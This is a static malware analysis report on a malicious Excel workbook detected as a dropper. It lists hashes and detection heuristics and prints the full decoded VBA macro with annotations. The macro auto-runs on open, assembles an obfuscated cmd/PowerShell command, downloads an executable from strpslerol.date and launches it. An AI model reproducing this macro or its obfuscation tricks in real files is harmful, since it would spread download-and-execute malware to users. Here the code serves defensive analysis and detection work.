Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 8bfe295a65b8b289…

MALICIOUS

Office (OLE) / .XLS

46.5 KB · Created: 2000-10-05 12:21:25 · Authoring application: Microsoft Excel · First seen: 2026-06-18
MD5: 25e641ca520a4d825a0210ac4989052a · SHA-1: c0f7448fcfb5a7e3078c3b1b089a589943d718fe · SHA-256: 8bfe295a65b8b28986c03f00a0add472a0925f89742bf204d69b058cd87f3a89
Risk Score: 230

Heuristics 7

  • ClamAV: Xls.Dropper.Donoff-6758222-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Donoff-6758222-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell pijokero
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Shell pijokero
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://strpslerol.date/dati.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3061 bytes
SHA-256: 12b4a1ebf8139f4c34c9843669841874eafadffc84d66f15ec1cd40a495fdbd4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execute entry point: Excel runs Workbook_Open as soon as the document is
' opened with macros enabled (the SE_ENABLE_LURE finding is what coaxes the user
' into enabling them). This is the only code path into the rest of the module.
Sub Workbook_Open()
' xlCategory is an Excel built-in enum constant (XlAxisType, value 1), so this
' guard is always true. It adds no real condition - only visual noise.
If xlCategory > 0.1 Then
' pijokero() assembles the full command line from string fragments at run time,
' so the launched command never appears literally anywhere in the source.
Shell pijokero
End If
End Sub

' Returns the constant "th". Not referenced anywhere else in the extracted
' module - dead code, most likely filler to dilute the suspicious content.
Function enchteinerdom()
enchteinerdom = "th"
End Function

' Builds the first part of the shell argument: the word "pOwERShell" split by
' "^" characters (cmd.exe escape characters that cmd strips before the text
' reaches the program), followed by caret-split parameter switches supplied by
' poltergeystore(), chempionsd(), nigerias() and chivasgoa(). Caret insertion
' and mixed case are the obfuscation cues worth alerting on here.
Function tuplook()
' Pointless temporary ("" & "O" is just "O") - source variation, not logic.
tooool = "" & "O"
' "+" and "&" both concatenate when every operand is a string, so mixing them
' changes nothing; it only varies the source text.
tuplook = "p" + "^" + tooool + "w" + "^E" + "RS" + "^he" + "l^" + "l" + poltergeystore + " -N" + "o" + chempionsd + "I" + "l" + "e^" + nigerias + "X" + "^Ec" + "^" + "U" & chivasgoa
End Function

' Top-level command assembler, called from Workbook_Open via Shell.
' magaraje() yields "cMD.ex"; appending "e   /" and "c """ produces a
' mixed-case cmd.exe invocation with a /c switch and an opening quote, then the
' quoted argument is tuplook() (interpreter + switches) + galvolero() (payload
' script) + the closing quote. The surplus spaces and split quote characters
' exist to defeat naive substring matching.
Function pijokero()
pijokero = magaraje + "e   /" + "c """ + tuplook + galvolero + """"
End Function
' Returns "  -e": the space-padded start of a parameter switch that tuplook()
' completes with further caret-split fragments.
Function nigerias()
nigerias = "  -e"
End Function
' Returns "^x^e^  ": the caret-split tail of a ".exe" file extension.
' Consumed by poltergeystore(), which prefixes it with "^.e".
Function footerpad()
deopooter = "^x"
footerpad = deopooter + "^e^  "
End Function
' Reassembles the interpreter name from innocuous-looking pieces so the string
' "cmd" never appears in the source:
'   "c" + Chr(77)                 -> "cM"
'   "D." & Left("external hard",2) -> "D.ex"
' Result: "cMD.ex" (pijokero() appends the trailing "e"). Building a process
' name via Chr()/Left() is a classic macro-dropper indicator.
Function magaraje()
madagaskarus = "external hard"
harddisks = "c" + Chr(77)
tupertup = "D." & Left(madagaskarus, 2)
magaraje = harddisks + tupertup
End Function
' Returns "prO^F": a caret-split fragment of a parameter switch name used by
' tuplook() (the caret is removed by cmd.exe before execution).
Function chempionsd()
zeebdd = "O^F"
chempionsd = "p" + "r" + zeebdd
End Function

' Returns "  B^Ypa^S^s ", which reads "BYpaSs" once cmd.exe strips the carets.
' It is the trailing value appended by tuplook() after its last switch fragment.
Function chivasgoa()
chivasgoa = "  " + "B^Y" + "pa^" + "S^" + "s "
End Function

' Supplies the middle of the interpreter command line: "^.e" & footerpad()
' gives a caret-split ".exe" extension, followed by several caret-split switch
' fragments ("-nO^l ", "-No^Ni^Nt^", "-W^In" & "DO^w" & "s^ 1"). Chr(94) is
' just another "^". As elsewhere, "+" and "&" are interchangeable here.
Function poltergeystore()
hhneg = "DO^w"
poltergeystore = "^.e" & footerpad & "-nO^" + "l " + "-No" + "^N" + "i^N" + "t" + Chr(94) & "  -" + "W^" & "I" + "n" & hhneg + "s" + "^ 1"
End Function

' Payload stage. Over two statements it builds a PowerShell script in which the
' real command is chopped into a dozen short variables ($dr, $kp, $ed, $ipo,
' ...) that are concatenated and run through Invoke-Expression (itself spelled
' "I"+"nv"+"oke-E"+"xp"+"ression"). Read together the fragments form a
' New-Object .NET WebClient download of the URL on the second line into a file,
' followed by a start-process of that file - a download-and-execute dropper,
' consistent with the OLE_VBA_OBFUSCATED_SHELL_URL finding.
' zozox(3) / zozox(2) insert random letters into the file name, so that name
' changes on every run and is NOT a stable indicator; the URL
' (https://strpslerol.date/dati.exe, see EMBEDDED_URL) and the
' Invoke-Expression / WebClient pattern are the durable detection hooks.
Function galvolero()
galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ip" + "o=" + "'sy" + "st" + "';$" + "kos='t.we';$rem='e" + "nt).do';$sad"
galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + zozox(3) + "';$ji" + "='" + zozox(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://strpslerol.date/dati.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
End Function

' Returns n pseudo-random lowercase letters. galvolero() calls it with 3 and 2
' to randomize the file name embedded in the PowerShell script, which is why
' that name cannot be used as an indicator across samples or runs.
Function zozox(n As Integer) As String
    Dim i As Integer, k1 As Integer, k2 As Integer, s As String
    For i = 1 To n
        ' Rnd(<positive>) simply returns the next value of the generator; Timer is
        ' not acting as a seed here (that would need Randomize).
        k1 = Int(Rnd(Timer) * 26)
        ' Single assigned to Integer: rounds to 0, 1 or 2.
        k2 = Rnd(Timer) * 2
        ' Chr(97 + k1) is already in a-z, so the LCase branch below never changes
        ' anything - residue, not logic.
        s = Chr(97 + k1)
        If k2 > 1 Then s = LCase(s)
        zozox = zozox & s
    Next
End Function
 



Attribute VB_Name = "Foglio4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True